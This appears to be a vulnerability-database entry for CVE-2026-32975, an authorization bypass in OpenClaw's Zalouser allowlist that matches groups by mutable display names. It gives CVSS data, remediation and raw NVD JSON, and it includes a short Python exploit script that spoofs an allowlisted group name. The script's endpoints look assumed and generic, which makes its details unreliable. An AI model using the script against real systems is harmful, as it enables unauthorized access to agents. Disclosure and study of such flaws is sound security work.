Security Vulnerability Report
CVE-2026-32975 CVSS 9.8 CRITICAL

CVE-2026-32975

Published: 2026-03-29 13:17:02
Last Modified: 2026-03-30 17:13:47

Description

OpenClaw before 2026.3.12 contains a weak authorization vulnerability in Zalouser allowlist mode that matches mutable group display names instead of stable group identifiers. Attackers can create groups with identical names to allowlisted groups to bypass channel authorization and route messages from unintended groups to the agent. The weakness class is CWE-807 (a security decision that relies on an attacker-controllable input); remediation is to upgrade to 2026.3.12 or later and to key allowlists on stable group identifiers rather than display names.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
(Primary CVSS v3.1 metric. The raw data below also carries a secondary CVSS v4.0 assessment of 6.9 MEDIUM, with low confidentiality/integrity impact and no availability impact, so the 9.8 headline should be read alongside that lower score when prioritising.)

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw < 2026.3.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # Proof of Concept for CVE-2026-32975 # This script demonstrates how an attacker can bypass authorization # by creating a group with the same display name as an allowlisted group. import requests def exploit(target_url, allowlisted_group_name): # Step 1: Create a malicious group with the same display name create_group_url = f"{target_url}/api/groups" payload = { "display_name": allowlisted_group_name, # The vulnerable mutable field "description": "Malicious group created by attacker" } print(f"[*] Creating malicious group with name: {allowlisted_group_name}") response = requests.post(create_group_url, json=payload) if response.status_code == 201: malicious_group_id = response.json().get('id') print(f"[+] Malicious group created with ID: {malicious_group_id}") # Step 2: Send a message from the malicious group to the Agent send_msg_url = f"{target_url}/api/messages" message_payload = { "group_id": malicious_group_id, "content": "Unauthorized command execution via weak auth" } print(f"[*] Sending message from malicious group...") msg_response = requests.post(send_msg_url, json=message_payload) if msg_response.status_code == 200: print("[!] Exploit successful! Message routed to Agent despite authorization bypass.") else: print("[-] Failed to route message.") else: print("[-] Failed to create group.") if __name__ == "__main__": # Replace with actual target and discovered allowlist name TARGET = "http://openclaw-target:8080" ALLOWLISTED_NAME = "admin-ops" # Example discovered allowlisted name exploit(TARGET, ALLOWLISTED_NAME)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32975", "sourceIdentifier": "[email protected]", "published": "2026-03-29T13:17:01.763", "lastModified": "2026-03-30T17:13:46.863", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw before 2026.3.12 contains a weak authorization vulnerability in Zalouser allowlist mode that matches mutable group display names instead of stable group identifiers. Attackers can create groups with identical names to allowlisted groups to bypass channel authorization and route messages from unintended groups to the agent."}, {"lang": "es", "value": "OpenClaw anterior a 2026.3.12 contiene una vulnerabilidad de autorización débil en el modo de lista de permitidos de Zalouser que coincide con nombres de visualización de grupos mutables en lugar de identificadores de grupo estables. Los atacantes pueden crear grupos con nombres idénticos a los grupos en la lista de permitidos para eludir la autorización del canal y redirigir mensajes de grupos no deseados al agente."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": 
"NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-807"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.3.12", "matchCriteriaId": "B90EC1D8-4E2B-46AF-8E66-B689693A16CE"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f5mf-3r52-r83w", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-weak-authorization-via-mutable-group-names-in-zalouser-allowlist", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}